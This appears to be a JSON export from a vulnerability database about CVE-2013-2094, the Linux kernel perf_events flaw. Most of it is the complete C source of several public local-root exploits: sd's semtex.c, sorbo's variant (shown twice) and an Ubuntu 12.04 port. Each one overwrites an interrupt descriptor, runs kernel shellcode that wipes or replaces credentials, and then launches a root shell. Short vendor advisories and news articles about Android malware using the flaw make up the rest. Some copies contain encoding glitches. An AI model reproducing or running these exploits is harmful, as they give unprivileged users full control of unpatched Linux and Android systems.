Supports more targets.\n *\n */\n\n#define _GNU_SOURCE\n#include <string.h>\n#include <stdio.h>\n#include <unistd.h>\n#include <stdlib.h>\n#include <stdint.h>\n#include <sys/syscall.h>\n#include <sys/mman.h>\n#include <linux/perf_event.h>\n#include <signal.h>\n#include <assert.h>\n\n#define BASE\t\t0x380000000\n#define BASE_JUMP\t0x1780000000\n#define SIZE \t\t0x10000000\n#define KSIZE\t\t0x2000000\n\n#define TMP(x) (0xdeadbeef + (x))\n\nstruct idt {\n\tuint16_t limit;\n\tuint64_t addr;\n} __attribute__((packed));\n\nstatic int _fd;\n\nstatic int perf_open(uint64_t off)\n{\n\tstruct perf_event_attr attr;\n\tint rc;\n\n//\tprintf(\"perf open %lx [%d]\\n\", off, (int) off);\n\n\tmemset(&attr, 0, sizeof(attr));\n\n\tattr.type \t = PERF_TYPE_SOFTWARE;\n\tattr.size \t = sizeof(attr);\n\tattr.config \t = off;\n\tattr.mmap \t = 1;\n\tattr.comm \t = 1;\n\tattr.exclude_kernel = 1;\n\n\trc = syscall(SYS_perf_event_open, &attr, 0, -1, -1, 0);\n\n\treturn rc;\n}\n\nvoid __sc_start(void);\nvoid __sc_next(void);\n\nvoid __sc(void)\n{\n\tasm(\"__sc_start:\\n\"\n\t \"call __sc_next\\n\"\n\t \"iretq\\n\"\n\t \"__sc_next:\\n\");\n}\n\nvoid sc(void)\n{\n\tint i, j;\n\tuint8_t *current = *(uint8_t **)(((uint64_t) &i) & (-8192));\n\tuint64_t kbase = ((uint64_t)current) >> 36;\n\tint uid = TMP(1);\n\tint gid = TMP(2);\n\n\tfor (i = 0; i < 4000; i += 4) {\n\t\tuint64_t *p = (void *) ¤t[i];\n\t\tuint32_t *cred = (uint32_t*) p[0];\n\n\t\tif ((p[0] != p[1]) || ((p[0]>>36) != kbase))\n\t\t\tcontinue;\n\n\t\tfor (j = 0; j < 20; j++) {\n\t\t\tif (cred[j] == uid && cred[j + 1] == gid) {\n\t\t\t\tfor (i = 0; i < 8; i++) {\n\t\t\t\t\tcred[j + i] = 0;\n\t\t\t\t\treturn;\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\t}\n}\n\nstatic void sc_replace(uint8_t *sc, uint32_t needle, uint32_t val)\n{\n\tvoid *p;\n\n\tp = memmem(sc, 900, &needle, sizeof(needle));\n\tif (!p)\n\t\terrx(1, \"can't find %x\", needle);\n\n\tmemcpy(p, &val, sizeof(val));\n}\n\nstatic void *map_mem(uint64_t addr)\n{\n\tvoid *p;\n\n\tp = 
mmap((void*) addr, SIZE, PROT_READ | PROT_WRITE,\n\t\t MAP_ANONYMOUS | MAP_PRIVATE | MAP_FIXED, -1, 0);\n\n\tif (p == MAP_FAILED)\n\t\terr(1, \"mmap()\");\n\n\treturn p;\n}\n\nstatic int find_mem(void *mem, uint8_t c)\n{\n\tint i;\n\tuint8_t *p = mem;\n\n\tfor (i = 0; i < SIZE; i++) {\n\t\tif (p[i] == c)\n\t\t\treturn i;\n\t}\n\n\treturn -1;\n}\n\nstatic void dropshell()\n{\n\tif (setuid(0) != 0)\n\t\terrx(1, \"failed\");\n\n\tprintf(\"Launching shell\\n\");\n\n\texecl(\"/bin/sh\", \"sh\", NULL);\n\texit(0);\n}\n\nvoid morte(int x)\n{\n\tprintf(\"Got signal\\n\");\n\tclose(_fd);\n\tdropshell();\n}\n\nstatic void trigger(int intr)\n{\n\tswitch (intr) {\n\tcase 0:\n\t\tdo {\n\t\t\tint z = 1;\n\t\t\tint a = 1;\n\n\t\t\tz--;\n\n\t\t\ta /= z;\n\t\t} while (0);\n\t\tbreak;\n\n\tcase 4:\n\t\tasm(\"int $4\");\n\t\tbreak;\n\n\tcase 0x80:\n\t\tasm(\"int $0x80\");\n\t\tbreak;\n\n\tdefault:\n\t\terrx(1, \"unknown intr %d\", intr);\n\t}\n\n\tsleep(3);\n}\n\nint main(int argc, char *argv[])\n{\n\tuint32_t *p[2];\n\tint fd, i;\n\tuint64_t off;\n\tuint64_t addr = BASE;\n\tstruct idt idt;\n\tuint8_t *kbase;\n\tint sz = 4;\n\tint intr = 4;\n\n\tprintf(\"Searchin...\\n\");\n\n\tp[0] = map_mem(BASE);\n\tp[1] = map_mem(BASE_JUMP);\n\n\tmemset(p[1], 0x69, SIZE);\n\n\toff = 0xFFFFFFFFL;\n\tfd = perf_open(off);\n\tclose(fd);\n\n\ti = find_mem(p[0], 0xff);\n\tif (i == -1) {\n\t\ti = find_mem(p[1], 0x68);\n\n\t\tif (i == -1)\n\t\t\terrx(1, \"Can't find overwrite\");\n\n\t\tsz = 24;\n\t\taddr = BASE_JUMP;\n\t\tprintf(\"detected CONFIG_JUMP_LABEL\\n\");\n\t}\n\n\tmunmap(p[0], SIZE);\n\tmunmap(p[1], SIZE);\n\n\taddr += i;\n\taddr -= off * sz;\n\n\tprintf(\"perf_swevent_enabled is at 0x%lx\\n\", addr);\n\n\tasm(\"sidt %0\" : \"=m\" (idt));\n\n\tprintf(\"IDT at 0x%lx\\n\", idt.addr);\n\n\toff = addr - idt.addr;\n\toff -= 8;\n\n\tswitch (off % sz) {\n\tcase 0:\n\t\tintr = 0;\n\t\tbreak;\n\n\tcase 8:\n\t\tintr = 0x80;\n\t\tbreak;\n\n\tcase 16:\n\t\tintr = 4;\n\t\tbreak;\n\n\tdefault:\n\t\terrx(1, 
\"remainder %d\", off % sz);\n\t}\n\n\tprintf(\"Using interrupt %d\\n\", intr);\n\n\toff -= 16 * intr;\n\n\tassert((off % sz) == 0);\n\n\toff /= sz;\n\toff = -off;\n\n//\tprintf(\"Offset %lx\\n\", off);\n\n\tkbase = (uint8_t*) (idt.addr & 0xFF000000);\n\n\tprintf(\"Shellcode at %p\\n\", kbase);\n\n\tif (mmap(kbase, KSIZE, PROT_READ | PROT_WRITE | PROT_EXEC,\n\t MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED, -1, 0) == MAP_FAILED)\n\t\terr(1, \"mmap()\");\n\n\tmemset(kbase, 0x90, KSIZE);\n\tkbase += KSIZE - 1024;\n\n\ti = __sc_next - __sc_start;\n\tmemcpy(kbase, __sc_start, i);\n\tkbase += i;\n\tmemcpy(kbase, sc, 900);\n\n\tsc_replace(kbase, TMP(1), getuid());\n\tsc_replace(kbase, TMP(2), getgid());\n\n\tsignal(SIGALRM, morte);\n\talarm(2);\n\n\tprintf(\"Triggering sploit\\n\");\n\t_fd = perf_open(off);\n\n\ttrigger(intr);\n\n\texit(0);\n}", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-04-01T19:04:27", "description": "\nLinux Kernel 2.6.32 3.x (CentOS 56) - PERF_EVENTS Local Privilege Escalation (1)", "edition": 1, "published": "2013-05-14T00:00:00", "title": "Linux Kernel 2.6.32 3.x (CentOS 56) - PERF_EVENTS Local Privilege Escalation (1)", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-2094"], "modified": "2013-05-14T00:00:00", "id": "EXPLOITPACK:C8EE3F99CF50DA0F219FC69406122E2C", "href": "", "sourceData": "/*\n * linux 2.6.37-3.x.x x86_64, ~100 LOC\n * gcc-4.6 -O2 semtex.c && ./a.out\n * 2010 sd@fucksheep.org, salut!\n *\n * update may 2013:\n * seems like centos 2.6.32 backported the perf bug, lol.\n * jewgold to 115T6jzGrVMgQ2Nt1Wnua7Ch1EuL9WXT2g if you insist.\n * \n * EDB Note: Update ~ http://timetobleed.com/a-closer-look-at-a-recent-privilege-escalation-bug-in-linux-cve-2013-2094/\n * ~ https://github.com/realtalk/cve-2013-2094/blob/master/rewritten_semtex.c\n */\n\n#define _GNU_SOURCE 1\n#include <stdint.h>\n#include <stdio.h>\n#include <stdlib.h>\n#include <string.h>\n#include <unistd.h>\n#include 
<sys/mman.h>\n#include <syscall.h>\n#include <stdint.h>\n#include <assert.h>\n\n#define BASE 0x380000000\n#define SIZE 0x010000000\n#define KSIZE 0x2000000\n#define AB(x) ((uint64_t)((0xababababLL<<32)^((uint64_t)((x)*313337))))\n\nvoid fuck() {\n int i,j,k;\n uint64_t uids[4] = { AB(2), AB(3), AB(4), AB(5) };\n uint8_t *current = *(uint8_t **)(((uint64_t)uids) & (-8192));\n uint64_t kbase = ((uint64_t)current)>>36;\n uint32_t *fixptr = (void*) AB(1);\n *fixptr = -1;\n\n for (i=0; i<4000; i+=4) {\n uint64_t *p = (void *)¤t[i];\n uint32_t *t = (void*) p[0];\n if ((p[0] != p[1]) || ((p[0]>>36) != kbase)) continue;\n for (j=0; j<20; j++) { for (k = 0; k < 8; k++)\n if (((uint32_t*)uids)[k] != t[j+k]) goto next;\n for (i = 0; i < 8; i++) t[j+i] = 0;\n for (i = 0; i < 10; i++) t[j+9+i] = -1;\n return;\nnext:; }\n }\n}\n\nvoid sheep(uint32_t off) {\n uint64_t buf[10] = { 0x4800000001,off,0,0,0,0x300 };\n int fd = syscall(298, buf, 0, -1, -1, 0);\n assert(!close(fd));\n}\n\n\nint main() {\n uint64_t u,g,needle, kbase, *p; uint8_t *code;\n uint32_t *map, j = 5;\n int i;\n struct {\n uint16_t limit;\n uint64_t addr;\n } __attribute__((packed)) idt;\n assert((map = mmap((void*)BASE, SIZE, 3, 0x32, 0,0)) == (void*)BASE);\n memset(map, 0, SIZE);\n sheep(-1); sheep(-2);\n for (i = 0; i < SIZE/4; i++) if (map[i]) {\n assert(map[i+1]);\n break;\n }\n assert(i<SIZE/4);\n asm (\"sidt %0\" : \"=m\" (idt));\n kbase = idt.addr & 0xff000000;\n u = getuid(); g = getgid();\n assert((code = (void*)mmap((void*)kbase, KSIZE, 7, 0x32, 0, 0)) == (void*)kbase);\n memset(code, 0x90, KSIZE); code += KSIZE-1024; memcpy(code, &fuck, 1024);\n memcpy(code-13,\"\\x0f\\x01\\xf8\\xe8\\5\\0\\0\\0\\x0f\\x01\\xf8\\x48\\xcf\",\n printf(\"2.6.37-3.x x86_64\\nsd@fucksheep.org 2010\\n\") % 27);\n setresuid(u,u,u); setresgid(g,g,g);\n while (j--) {\n needle = AB(j+1);\n assert(p = memmem(code, 1024, &needle, 8));\n if (!p) continue;\n *p = j?((g<<32)|u):(idt.addr + 0x48);\n }\n sheep(-i + 
(((idt.addr&0xffffffff)-0x80000000)/4) + 16);\n asm(\"int $0x4\"); assert(!setuid(0));\n return execl(\"/bin/bash\", \"-sh\", NULL);\n}", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "android": [{"lastseen": "2020-12-24T13:21:11", "bulletinFamily": "software", "cvelist": ["CVE-2013-2094"], "description": "The perf_swevent_init function in kernel/events/core.c in the Linux kernel before 3.8.9 uses an incorrect integer data type, which allows local users to gain privileges via a crafted perf_event_open system call.", "edition": 2, "modified": "2019-07-08T00:00:00", "published": "2019-07-08T00:00:00", "id": "ANDROID:LIBPERF_EVENT", "href": "http://www.androidvulnerabilities.org/vulnerabilities/libperf_event.html", "title": "libperf_event", "type": "android", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "amazon": [{"lastseen": "2020-11-10T12:36:18", "bulletinFamily": "unix", "cvelist": ["CVE-2013-2094"], "description": "**Issue Overview:**\n\nThe perf_swevent_init function in kernel/events/core.c in the Linux kernel before 3.8.9 uses an incorrect integer data type, which allows local users to gain privileges via a crafted perf_event_open system call. \n\n \n**Affected Packages:** \n\n\nkernel\n\n \n**Issue Correction:** \nRun _yum update kernel_ to update your system. 
You will need to reboot your system in order for the new kernel to be running.\n\n \n\n\n**New Packages:**\n \n \n i686: \n kernel-tools-3.4.43-43.43.amzn1.i686 \n kernel-headers-3.4.43-43.43.amzn1.i686 \n kernel-debuginfo-3.4.43-43.43.amzn1.i686 \n kernel-tools-debuginfo-3.4.43-43.43.amzn1.i686 \n kernel-debuginfo-common-i686-3.4.43-43.43.amzn1.i686 \n kernel-devel-3.4.43-43.43.amzn1.i686 \n kernel-3.4.43-43.43.amzn1.i686 \n \n noarch: \n kernel-doc-3.4.43-43.43.amzn1.noarch \n \n src: \n kernel-3.4.43-43.43.amzn1.src \n \n x86_64: \n kernel-headers-3.4.43-43.43.amzn1.x86_64 \n kernel-3.4.43-43.43.amzn1.x86_64 \n kernel-debuginfo-common-x86_64-3.4.43-43.43.amzn1.x86_64 \n kernel-tools-3.4.43-43.43.amzn1.x86_64 \n kernel-tools-debuginfo-3.4.43-43.43.amzn1.x86_64 \n kernel-devel-3.4.43-43.43.amzn1.x86_64 \n kernel-debuginfo-3.4.43-43.43.amzn1.x86_64 \n \n \n", "edition": 4, "modified": "2013-05-14T15:37:00", "published": "2013-05-14T15:37:00", "id": "ALAS-2013-190", "href": "https://alas.aws.amazon.com/ALAS-2013-190.html", "title": "Medium: kernel", "type": "amazon", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "zdt": [{"lastseen": "2018-02-06T03:10:23", "description": "Exploit for linux platform in category local exploits", "edition": 2, "published": "2014-06-01T00:00:00", "type": "zdt", "title": "Ubuntu 12.04.0-2LTS x64 perf_swevent_init - Kernel Local Root Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-2094"], "modified": "2014-06-01T00:00:00", "id": "1337DAY-ID-22298", "href": "https://0day.today/exploit/description/22298", "sourceData": "/**\r\n * Ubuntu 12.04 3.x x86_64 perf_swevent_init Local root exploit\r\n * by Vitaly Nikolenko ([email\u00a0protected])\r\n *\r\n * based on semtex.c by sd\r\n *\r\n * Supported targets:\r\n * [0] Ubuntu 12.04.0 - 3.2.0-23-generic\r\n * [1] Ubuntu 12.04.1 - 3.2.0-29-generic\r\n * [2] Ubuntu 12.04.2 - 3.5.0-23-generic\r\n *\r\n * $ gcc vnik.c -O2 -o vnik\r\n *\r\n * $ uname -r\r\n * 
3.2.0-23-generic\r\n *\r\n * $ ./vnik 0\r\n */\r\n \r\n#define _GNU_SOURCE 1\r\n#include <stdint.h>\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <string.h>\r\n#include <unistd.h>\r\n#include <sys/mman.h>\r\n#include <syscall.h>\r\n#include <stdint.h>\r\n#include <assert.h>\r\n \r\n#define BASE 0x1780000000\r\n#define SIZE 0x0010000000\r\n#define KSIZE 0x2000000\r\n#define AB(x) ((uint64_t)((0xababababLL<<32)^((uint64_t)((x)*313337))))\r\n \r\ntypedef int __attribute__((regparm(3))) (*commit_creds_fn)(unsigned long cred);\r\ntypedef unsigned long __attribute__((regparm(3))) (*prepare_kernel_cred_fn)(unsigned long cred);\r\n \r\nuint64_t targets[3][3] =\r\n {{0xffffffff81ef67e0, // perf_swevent_enabled\r\n 0xffffffff81091630, // commit_creds\r\n 0xffffffff810918e0}, // prepare_kernel_cred\r\n {0xffffffff81ef67a0,\r\n 0xffffffff81091220,\r\n 0xffffffff810914d0},\r\n {0xffffffff81ef5940,\r\n 0xffffffff8107ee30,\r\n 0xffffffff8107f0c0}\r\n };\r\n \r\nvoid __attribute__((regparm(3))) payload() {\r\n uint32_t *fixptr = (void*)AB(1);\r\n // restore the handler\r\n *fixptr = -1;\r\n commit_creds_fn commit_creds = (commit_creds_fn)AB(2);\r\n prepare_kernel_cred_fn prepare_kernel_cred = (prepare_kernel_cred_fn)AB(3);\r\n commit_creds(prepare_kernel_cred((uint64_t)NULL));\r\n}\r\n \r\nvoid trigger(uint32_t off) {\r\n uint64_t buf[10] = { 0x4800000001, off, 0, 0, 0, 0x300 };\r\n int fd = syscall(298, buf, 0, -1, -1, 0);\r\n assert( !close(fd) );\r\n}\r\n \r\nint main(int argc, char **argv) {\r\n uint64_t off64, needle, kbase, *p;\r\n uint8_t *code;\r\n uint32_t int_n, j = 5, target = 1337;\r\n int offset = 0;\r\n void *map;\r\n \r\n assert(argc == 2 && \"target?\");\r\n assert( (target = atoi(argv[1])) < 3 );\r\n \r\n struct {\r\n uint16_t limit;\r\n uint64_t addr;\r\n } __attribute__((packed)) idt;\r\n \r\n // mmap user-space block so we don't page fault\r\n // on sw_perf_event_destroy\r\n assert((map = mmap((void*)BASE, SIZE, 3, 0x32, 0,0)) == (void*)BASE);\r\n 
memset(map, 0, SIZE);\r\n \r\n asm volatile(\"sidt %0\" : \"=m\" (idt));\r\n kbase = idt.addr & 0xff000000;\r\n printf(\"IDT addr = 0x%lx\\n\", idt.addr);\r\n \r\n assert((code = (void*)mmap((void*)kbase, KSIZE, 7, 0x32, 0, 0)) == (void*)kbase);\r\n memset(code, 0x90, KSIZE); code += KSIZE-1024; memcpy(code, &payload, 1024);\r\n memcpy(code-13,\"\\x0f\\x01\\xf8\\xe8\\5\\0\\0\\0\\x0f\\x01\\xf8\\x48\\xcf\", 13);\r\n \r\n // can only play with interrupts 3, 4 and 0x80\r\n for (int_n = 3; int_n <= 0x80; int_n++) {\r\n for (off64 = 0x00000000ffffffff; (int)off64 < 0; off64--) {\r\n int off32 = off64;\r\n \r\n if ((targets[target][0] + ((uint64_t)off32)*24) == (idt.addr + int_n*16 + 8)) {\r\n offset = off32;\r\n goto out;\r\n }\r\n }\r\n if (int_n == 4) {\r\n // shit, let's try 0x80 if the kernel is compiled with\r\n // CONFIG_IA32_EMULATION\r\n int_n = 0x80 - 1;\r\n }\r\n }\r\nout:\r\n assert(offset);\r\n printf(\"Using int = %d with offset = %d\\n\", int_n, offset);\r\n \r\n for (j = 0; j < 3; j++) {\r\n needle = AB(j+1);\r\n assert(p = memmem(code, 1024, &needle, 8));\r\n *p = !j ? 
(idt.addr + int_n * 16 + 8) : targets[target][j];\r\n }\r\n trigger(offset);\r\n switch (int_n) {\r\n case 3:\r\n asm volatile(\"int $0x03\");\r\n break;\r\n case 4:\r\n asm volatile(\"int $0x04\");\r\n break;\r\n case 0x80:\r\n asm volatile(\"int $0x80\");\r\n }\r\n \r\n assert(!setuid(0));\r\n return execl(\"/bin/bash\", \"-sh\", NULL);\r\n}\n\n# 0day.today [2018-02-06] #", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://0day.today/exploit/22298"}, {"lastseen": "2018-02-17T21:24:57", "description": "Exploit for linux platform in category local exploits", "edition": 2, "published": "2013-06-11T00:00:00", "type": "zdt", "title": "Linux kernel perf_swevent_init - Local root Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-2094"], "modified": "2013-06-11T00:00:00", "id": "1337DAY-ID-20880", "href": "https://0day.today/exploit/description/20880", "sourceData": "/*\r\n * CVE-2013-2094 exploit x86_64 Linux < 3.8.9\r\n * by sorbo ([email\u00a0protected]) June 2013\r\n *\r\n * Based on sd's exploit. 
Supports more targets.\r\n *\r\n */\r\n \r\n#define _GNU_SOURCE\r\n#include <string.h>\r\n#include <stdio.h>\r\n#include <unistd.h>\r\n#include <stdlib.h>\r\n#include <stdint.h>\r\n#include <sys/syscall.h>\r\n#include <sys/mman.h>\r\n#include <linux/perf_event.h>\r\n#include <signal.h>\r\n#include <assert.h>\r\n \r\n#define BASE 0x380000000\r\n#define BASE_JUMP 0x1780000000\r\n#define SIZE 0x10000000\r\n#define KSIZE 0x2000000\r\n \r\n#define TMP(x) (0xdeadbeef + (x))\r\n \r\nstruct idt {\r\n uint16_t limit;\r\n uint64_t addr;\r\n} __attribute__((packed));\r\n \r\nstatic int _fd;\r\n \r\nstatic int perf_open(uint64_t off)\r\n{\r\n struct perf_event_attr attr;\r\n int rc;\r\n \r\n// printf(\"perf open %lx [%d]\\n\", off, (int) off);\r\n \r\n memset(&attr, 0, sizeof(attr));\r\n \r\n attr.type = PERF_TYPE_SOFTWARE;\r\n attr.size = sizeof(attr);\r\n attr.config = off;\r\n attr.mmap = 1;\r\n attr.comm = 1;\r\n attr.exclude_kernel = 1;\r\n \r\n rc = syscall(SYS_perf_event_open, &attr, 0, -1, -1, 0);\r\n \r\n return rc;\r\n}\r\n \r\nvoid __sc_start(void);\r\nvoid __sc_next(void);\r\n \r\nvoid __sc(void)\r\n{\r\n asm(\"__sc_start:\\n\"\r\n \"call __sc_next\\n\"\r\n \"iretq\\n\"\r\n \"__sc_next:\\n\");\r\n}\r\n \r\nvoid sc(void)\r\n{\r\n int i, j;\r\n uint8_t *current = *(uint8_t **)(((uint64_t) &i) & (-8192));\r\n uint64_t kbase = ((uint64_t)current) >> 36;\r\n int uid = TMP(1);\r\n int gid = TMP(2);\r\n \r\n for (i = 0; i < 4000; i += 4) {\r\n uint64_t *p = (void *) \u00a4t[i];\r\n uint32_t *cred = (uint32_t*) p[0];\r\n \r\n if ((p[0] != p[1]) || ((p[0]>>36) != kbase))\r\n continue;\r\n \r\n for (j = 0; j < 20; j++) {\r\n if (cred[j] == uid && cred[j + 1] == gid) {\r\n for (i = 0; i < 8; i++) {\r\n cred[j + i] = 0;\r\n return;\r\n }\r\n }\r\n }\r\n }\r\n}\r\n \r\nstatic void sc_replace(uint8_t *sc, uint32_t needle, uint32_t val)\r\n{\r\n void *p;\r\n \r\n p = memmem(sc, 900, &needle, sizeof(needle));\r\n if (!p)\r\n errx(1, \"can't find %x\", needle);\r\n \r\n memcpy(p, 
&val, sizeof(val));\r\n}\r\n \r\nstatic void *map_mem(uint64_t addr)\r\n{\r\n void *p;\r\n \r\n p = mmap((void*) addr, SIZE, PROT_READ | PROT_WRITE,\r\n MAP_ANONYMOUS | MAP_PRIVATE | MAP_FIXED, -1, 0);\r\n \r\n if (p == MAP_FAILED)\r\n err(1, \"mmap()\");\r\n \r\n return p;\r\n}\r\n \r\nstatic int find_mem(void *mem, uint8_t c)\r\n{\r\n int i;\r\n uint8_t *p = mem;\r\n \r\n for (i = 0; i < SIZE; i++) {\r\n if (p[i] == c)\r\n return i;\r\n }\r\n \r\n return -1;\r\n}\r\n \r\nstatic void dropshell()\r\n{\r\n if (setuid(0) != 0)\r\n errx(1, \"failed\");\r\n \r\n printf(\"Launching shell\\n\");\r\n \r\n execl(\"/bin/sh\", \"sh\", NULL);\r\n exit(0);\r\n}\r\n \r\nvoid morte(int x)\r\n{\r\n printf(\"Got signal\\n\");\r\n close(_fd);\r\n dropshell();\r\n}\r\n \r\nstatic void trigger(int intr)\r\n{\r\n switch (intr) {\r\n case 0:\r\n do {\r\n int z = 1;\r\n int a = 1;\r\n \r\n z--;\r\n \r\n a /= z;\r\n } while (0);\r\n break;\r\n \r\n case 4:\r\n asm(\"int $4\");\r\n break;\r\n \r\n case 0x80:\r\n asm(\"int $0x80\");\r\n break;\r\n \r\n default:\r\n errx(1, \"unknown intr %d\", intr);\r\n }\r\n \r\n sleep(3);\r\n}\r\n \r\nint main(int argc, char *argv[])\r\n{\r\n uint32_t *p[2];\r\n int fd, i;\r\n uint64_t off;\r\n uint64_t addr = BASE;\r\n struct idt idt;\r\n uint8_t *kbase;\r\n int sz = 4;\r\n int intr = 4;\r\n \r\n printf(\"Searchin...\\n\");\r\n \r\n p[0] = map_mem(BASE);\r\n p[1] = map_mem(BASE_JUMP);\r\n \r\n memset(p[1], 0x69, SIZE);\r\n \r\n off = 0xFFFFFFFFL;\r\n fd = perf_open(off);\r\n close(fd);\r\n \r\n i = find_mem(p[0], 0xff);\r\n if (i == -1) {\r\n i = find_mem(p[1], 0x68);\r\n \r\n if (i == -1)\r\n errx(1, \"Can't find overwrite\");\r\n \r\n sz = 24;\r\n addr = BASE_JUMP;\r\n printf(\"detected CONFIG_JUMP_LABEL\\n\");\r\n }\r\n \r\n munmap(p[0], SIZE);\r\n munmap(p[1], SIZE);\r\n \r\n addr += i;\r\n addr -= off * sz;\r\n \r\n printf(\"perf_swevent_enabled is at 0x%lx\\n\", addr);\r\n \r\n asm(\"sidt %0\" : \"=m\" (idt));\r\n \r\n printf(\"IDT at 0x%lx\\n\", 
idt.addr);\r\n \r\n off = addr - idt.addr;\r\n off -= 8;\r\n \r\n switch (off % sz) {\r\n case 0:\r\n intr = 0;\r\n break;\r\n \r\n case 8:\r\n intr = 0x80;\r\n break;\r\n \r\n case 16:\r\n intr = 4;\r\n break;\r\n \r\n default:\r\n errx(1, \"remainder %d\", off % sz);\r\n }\r\n \r\n printf(\"Using interrupt %d\\n\", intr);\r\n \r\n off -= 16 * intr;\r\n \r\n assert((off % sz) == 0);\r\n \r\n off /= sz;\r\n off = -off;\r\n \r\n// printf(\"Offset %lx\\n\", off);\r\n \r\n kbase = (uint8_t*) (idt.addr & 0xFF000000);\r\n \r\n printf(\"Shellcode at %p\\n\", kbase);\r\n \r\n if (mmap(kbase, KSIZE, PROT_READ | PROT_WRITE | PROT_EXEC,\r\n MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED, -1, 0) == MAP_FAILED)\r\n err(1, \"mmap()\");\r\n \r\n memset(kbase, 0x90, KSIZE);\r\n kbase += KSIZE - 1024;\r\n \r\n i = __sc_next - __sc_start;\r\n memcpy(kbase, __sc_start, i);\r\n kbase += i;\r\n memcpy(kbase, sc, 900);\r\n \r\n sc_replace(kbase, TMP(1), getuid());\r\n sc_replace(kbase, TMP(2), getgid());\r\n \r\n signal(SIGALRM, morte);\r\n alarm(2);\r\n \r\n printf(\"Triggering sploit\\n\");\r\n _fd = perf_open(off);\r\n \r\n trigger(intr);\r\n \r\n exit(0);\r\n}\n\n# 0day.today [2018-02-17] #", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://0day.today/exploit/20880"}], "thn": [{"lastseen": "2017-01-08T18:01:20", "bulletinFamily": "info", "cvelist": ["CVE-2013-2094"], "description": "[](<http://3.bp.blogspot.com/-WIv2Y-SyS9U/Ubi1QXcUnZI/AAAAAAAAWG0/JaWW_8JFfmQ/s1600/Linux+kernel+privilege+escalation+exploit+ported+to+Android+platform.jpg>)\n\nMalware authors are notorious for quickly leveraging new exploits in the public domain for nefarious purposes. 
A recently discovered [Linux kernel](<http://thehackernews.com/2011/08/linux-kernel-31-rc2-released.html>) Local privilege [escalation exploit](<http://news.thehackernews.com/label/Exploit>), which allows attackers to gain complete control of infected devices, has been ported to the Android smartphone platform.\n\nThe Linux kernel 2.6.x, including [Red Hat](<http://thehackernews.com/2013/01/red-hat-patches-multiple-web.html>) Enterprise Linux 6, Ubuntu 12.04 LTS, Debian 6 and Suse Enterprise Linux 11 are vulnerable to privilege escalation flaw with [CVE-2013-2094](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2094>). \n\n \n\n\nCVE-2013-2094 states, \"_The perf_swevent_init function in kernel/events/core.c in the Linux kernel before 3.8.9 uses an incorrect integer data type, which allows local users to gain privileges via a crafted perf_event_open system call._\"\n\n \n\n\nExploit for Linux machines is publically [available here](<http://downloads.securityfocus.com/vulnerabilities/exploits/59846-1.c>). Privilege escalation exploits are particularly dangerous as they can allow [cybercriminals](<http://thehackernews.com/2013/05/researchers-uncovered-new-malware-used.html>) to gain complete control over the compromised device. \n\n \n\n\nThe exploit can be used to to access data from other applications, prevent users from uninstalling the malware, and make it possible for the attackers to [send premium rate text messages](<http://thehackernews.com/2012/01/fake-angry-birds-game-spreading-malware.html>) from the handset.\n\n \n\n\nSymantec [said](<http://www.symantec.com/connect/blogs/linux-kernel-exploit-ported-android>), \"_The Android operating system normally sandboxes every application so they cannot perform sensitive system operations or interfere with other installed applications. 
In the past, we have seen malware use privilege escalation exploits to access data from other applications, prevent uninstall, hide themselves, and also bypass the Android permissions model to enable behaviors such as sending premium SMS messages without user authorization._\"\n\n \n\n\nA majority of malicious mobile apps are fake or rogue apps that claim to have some function but will also contain [malicious](<http://thehackernews.com/2013/06/malicious-mobile-charger-can-hack-your.html>) behaviors that run without users\u2019 knowledge. Because there is no patch available yet for this flaw, so we recommend users to download apps from reputable marketplaces only.\n", "modified": "2013-10-14T11:48:19", "published": "2013-06-12T07:00:00", "id": "THN:6C6DBC3B917F276B59D2AE2592818634", "href": "http://thehackernews.com/2013/06/android-malware-loaded-with-linux.html", "type": "thn", "title": "Android malware loaded with Linux kernel privilege escalation exploit", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-01-27T09:17:25", "bulletinFamily": "info", "cvelist": ["CVE-2013-2596", "CVE-2012-4220", "CVE-2013-2597", "CVE-2014-3153", "CVE-2015-3636", "CVE-2013-2094", "CVE-2013-6282", "CVE-2013-2595", "CVE-2015-1805"], "description": "[](<https://3.bp.blogspot.com/-vajt220Zj4I/Wh0Uku8BM7I/AAAAAAAAu9I/bRr5OKxvItEeRJPcdJalda6ThesHt_1qQCLcBGAs/s1600/android-spying-app.png>)\n\nIn an attempt to protect Android users from malware and shady apps, Google has been continuously working to detect and remove malicious apps from your devices using its newly launched Google Play Protect service. 
\n \n[Google Play Protect](<https://thehackernews.com/2017/05/google-play-protect-android.html>)\u2014a security feature that uses machine learning and app usage analysis to check devices for potentially harmful apps\u2014recently helped Google researchers to identify a new deceptive family of Android spyware that was stealing a whole lot of information on users. \n \nDiscovered on targeted devices in African countries, Tizi is a fully-featured Android backdoor with rooting capabilities that installs spyware apps on victims' devices to steal sensitive data from popular social media apps like Facebook, Twitter, WhatsApp, Viber, Skype, LinkedIn, and Telegram. \n\n\n> \"The Google Play Protect security team discovered this family in September 2017 when device scans found an app with rooting capabilities that exploited old vulnerabilities,\" Google said in a [blog post](<https://security.googleblog.com/2017/11/tizi-detecting-and-blocking-socially.html>). \"The team used this app to find more applications in the Tizi family, the oldest of which is from October 2015.\"\n\nMost Tizi-infected apps are being advertised on social media websites and 3rd-party app stores, tricking users into installing them. \n \nOnce installed, the innocent looking app gains root access of the infected device to install spyware, which then first 